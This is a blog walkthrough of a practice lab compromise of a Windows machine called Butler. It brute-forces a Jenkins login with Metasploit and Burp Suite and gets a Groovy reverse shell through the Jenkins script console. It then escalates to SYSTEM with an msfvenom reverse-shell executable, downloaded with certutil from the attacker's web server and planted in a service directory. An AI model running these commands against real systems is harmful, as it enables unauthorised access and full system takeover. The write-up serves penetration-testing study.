BUTLER MACHINE EXPLOIT WALKTHROUGH

babsarena

Babs

Posted on July 13, 2024

BUTLER MACHINE EXPLOIT WALKTHROUGH

This walkthrough will showcase a creative approach in exploiting a windows machine named butler and gaining access on the machine.

After successfully setting up your butler windows machine, use the following details to login to the machine.

butler: JeNkIn5@44
administrator: A%rc!BcA!

We can login using the administrator password A%rc!BcA! so as to get the IP address of our butler windows machine.

After successful login to our windows machine, we open the command prompt and input the command below to get our IP address:



ipconfig



Enter fullscreen mode Exit fullscreen mode

Image description

From the image above, my IP address is "192.168.182.142"

We can start by pinging our windows machine from our kali using the command:



ping 192.168.182.142 -c3



Enter fullscreen mode Exit fullscreen mode

to make sure both machines are communicating

Image description

The next step now is to run an Nmap scan using the command:



nmap -p- -A 192.168.182.142



Enter fullscreen mode Exit fullscreen mode

Image description

From the above image we can see that port 8080 is open which is using http service, so the next step is to visit the website on our browser using:



192.168.182.142:8080



Enter fullscreen mode Exit fullscreen mode

Image description

We landed on a jenkins login page.
After much enumerations I couldn't find anything, so I searched the web for jenkins default password.

Image description

So I tried using the default password and it still failed.

Image description

So the next thing left for me now is to try a brute force attack and for that I want to use metasploit.

So we open a new tab on our kali and input the command below to turn on metasploit:



msfconsole



Enter fullscreen mode Exit fullscreen mode

Image description

So next, we search the word jenkins using the command:



search jenkins



Enter fullscreen mode Exit fullscreen mode

Image description

For me on number 19, it's showing me a jenkins login with the details "19 auxiliary/scanner/http/jenkins_login"

NB- your own jenkins login number might be different, so make sure to use the jenkins login number of yours.

So next, I input the command:



use 19



Enter fullscreen mode Exit fullscreen mode

Then I input the command:



options



Enter fullscreen mode Exit fullscreen mode

Image description

My idea is to use rockyou.txt wordlist for both the username and password but it will take hours if not days for the brute force attack to be complete.

So for the options set the following parameters by inputting the command:



set username jenkins



Enter fullscreen mode Exit fullscreen mode


set pass_file /usr/share/wordlists/rockyou.txt



Enter fullscreen mode Exit fullscreen mode


set user_as_pass true



Enter fullscreen mode Exit fullscreen mode


set stop_on_success true



Enter fullscreen mode Exit fullscreen mode


set rhosts 192.168.182.142



Enter fullscreen mode Exit fullscreen mode

NB- So basically, what I am trying to do is use the username jenkins as a trial and see if it will have a successful login using the password file of rockyou.txt.

In a case where there's no username to try we can use rockyou.txt for the username file but like I said the attack would take hours if not days to be successful, so to make you get the password on time, make sure to set the username as jenkins.

Now input the command:



options



Enter fullscreen mode Exit fullscreen mode

to make sure all what was set has been properly set and is reflecting.

Image description

Now input the command below to run the exploit:



run



Enter fullscreen mode Exit fullscreen mode

Image description

After successfully running the exploit, we can see from the output that the username and password for the jenkins website is jenkins:jenkins

So both the username and password are the same.

  • I'd also like to show you how to use burp-suite for a brute-force attack.

HOW TO USE BURP-SUITE FOR BRUTE FORCE ATTACK

-Search for foxyproxy extension on your firefox browser on kali and then add it to your extension

Image description

Image description

  • Click on the extension, right click and select the manage extension option

Image description

  • Click on proxies and then add
  • Now set the title, type, hostname and port as seen in the image below and then save

Image description

Now once you have visited the jenkins login page, make sure your foxyproxy extension is switched on.

Image description

  • Now search for burpsuite on your kali and open it

Image description

  • Press next

Image description

  • Start burp

Image description

  • Click on proxy and set intercept to on

Image description

  • Remember to make sure that foxyproxy extension is on

-Now input a wrong username and password for the jenkin login

Image description

It will take you straight to burp and show you a page as seen below

Image description

  • right click and then send to repeater and also send to intruder

Image description

  • From repeater you can easily change the username and password and then click on send to know if the details are corrected but doing this with repeater will take time.

Image description

  • So now we switch to intruder

Image description

  • Next we double click on the username hacker and the click on add
  • Then we double click on the password hacker and the click on add

Image description

It has shown us from the image that we have highlighted two position/options that we would like to change

  • Next we switch out attack type to cluster bomb because we want to try all the usernames with all the passwords

Image description

  • Now click on payload

Image description

what we are trying to do is to guess some usernames and passwords that we would like to use for a brute force attack

  • So we input them as seen in the image below and click on add and keep adding as much as we want to.

Image description

  • Then we switch to 2 as seen in the image below and input the passwords we would like to try.

Image description

Image description

  • Click on start attack

Image description

  • Notice how from the response we got the status code is the same but what we are mainly focusing on is the length and from the image below we can see a big difference in the length for jenkins-jenkins, because the length difference gives us an indication that there's something different, so we try the username and password on the jenkins page.

NB- make sure to turn off your burp-suite and foxyproxy

Now we go back to our jenkins login page and input the username and password jenkins

Image description

we have successfully logged in.

Image description

Now we are trying to find a place to run code execution .

For that click on manage jenkins

Image description
And then click on script console

Image description

The script console seems to be in groovy

Image description

Search google for groovy reverse shell and select the one from github as seen in the image below

Image description

Now click on raw and copy all

Image description

Now paste it script console

Image description

Since the reverse shell script wants to use port 8044 so we set up a listener using the command:



nc -nvlp 8044



Enter fullscreen mode Exit fullscreen mode

Image description

Now we need to change the local host to our attacking machine's IP address

Image description

Image description

Now click on the run

Image description

We have successfully popped a shell

Image description

Input the command below to find out who we are on the system



whoami



Enter fullscreen mode Exit fullscreen mode

Image description

From the image above, we can see that we are butler and we are not system admin, so we would need to do some privilege escalation.

For this we would use a tool called winpeas
It is a privilege escalation tool for windows.

Search google for winpeas

Image description

select the one as seen in the image above

Then select the winpeasexe file

Image description

Scroll down and click on download the latest

Image description

Click on winpeasX64

Image description

Once you have successfully downloaded it, it should be in your downloads directory.

Image description

Now that it has been successfully downloaded, we need to host up a web server and then get the file from our shell we popped

To do that , input the command below in your downloads directory:



python3 -m http.server 80



Enter fullscreen mode Exit fullscreen mode

Image description

Then on our tab which we popped a shell, we need to go into a directory we know that we have read and write permission.

So input the command:



cd c:\users



Enter fullscreen mode Exit fullscreen mode

Input the command;



dir



Enter fullscreen mode Exit fullscreen mode

Image description

Now input the command:



cd butler



Enter fullscreen mode Exit fullscreen mode

Image description

Now we would put winpeas here because it is butler's base directory and we should have a higher permission for this directory.

So to put the file here, input the command;



certutil.exe -urlcache -f http://192.168.182.129/winPEASx64.exe winpeas.exe



Enter fullscreen mode Exit fullscreen mode

The file should have successfully downloaded and be named as winpeas.exe on the windows system

Input the command below to find the file:



dir



Enter fullscreen mode Exit fullscreen mode

Image description

Now we need to run winpeas and to do that we input the command:



winpeas.exe



Enter fullscreen mode Exit fullscreen mode

For this particular exploit, we are interested in finding out which services are running on the system, so scroll down to service information found from winpeas

Image description

The image above shows some of the services running on the butler windows machine.

Image description

Out of all the services running, the wiseboot is the one we are interested in.

The next step now is to generate some malware, we can use metasploit to do that but for this exploit we would be doing it manually using the command:



msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.182.129 LPORT=7777 -f exe > wise.exe



Enter fullscreen mode Exit fullscreen mode

NB- Make sure to change the LHOST to your kali's IP address.

Once the malware has been generated we need to host up a web server and receive it on our windows tab in which we popped the shell

Image description

The image above shows that I generated the malware on my Downloads directory, so I would host up the web server there using the command:



python3 -m http.server 80



Enter fullscreen mode Exit fullscreen mode

NB- Make sure you have cancelled the web server we were previously hosting.

Use Crtl C to cancel the previous one if you haven't
And if yours is still being hosted from the first time we hosted it and you do not wish to cancel, then do not cancel, just do not re-host it and then just input the command to receive the wise.exe file on the windows machine.

Next we need to open up a new tab and then listen on port 7777 because that is the port we plan on using for the exploit and for that we use the command:



nc -nvlp 7777



Enter fullscreen mode Exit fullscreen mode

Image description

Now we need to cd into the wise directory, so for that input the command:



cd c:\



Enter fullscreen mode Exit fullscreen mode


dir



Enter fullscreen mode Exit fullscreen mode

Then we need to go into the program file x86 directory, so input the command:



cd Program Files (x86)



Enter fullscreen mode Exit fullscreen mode

Image description

Now cd into wise using the command:



cd Wise



Enter fullscreen mode Exit fullscreen mode

Now we want to put the wise.exe file here, so we input the command:



certutil -urlcache -f http://192.168.182.129/wise.exe wise.exe



Enter fullscreen mode Exit fullscreen mode

Once it has been successful, input the command:



dir



Enter fullscreen mode Exit fullscreen mode

to confirm

Image description

We need to first stop the service that's running as wisebootassistant, because if we don't, we might pop a shell back as butler instead of system admin, so to stop the service, input the command:



sc stop wisebootassistant



Enter fullscreen mode Exit fullscreen mode

To confirm that the service has stopped, input the command:



sc query wisebootassistant



Enter fullscreen mode Exit fullscreen mode

Image description

Now we need to start it using the command:



sc start wisebootassistant



Enter fullscreen mode Exit fullscreen mode

We have successfully popped a shell as system.

Image description

Input the command below to confirm:



whoami



Enter fullscreen mode Exit fullscreen mode

Image description

and input the command below to get the system info:



systeminfo



Enter fullscreen mode Exit fullscreen mode

Image description

MAJOR PROBLEM YOU MIGHT FACE WHILE EXPLOITING THIS MACHINE

For some reasons the machine would keep shutting down so whenever it shuts down, make sure to turn it back on.

GOODLUCK!!!

šŸ’– šŸ’Ŗ šŸ™… šŸš©
babsarena
Babs

Posted on July 13, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related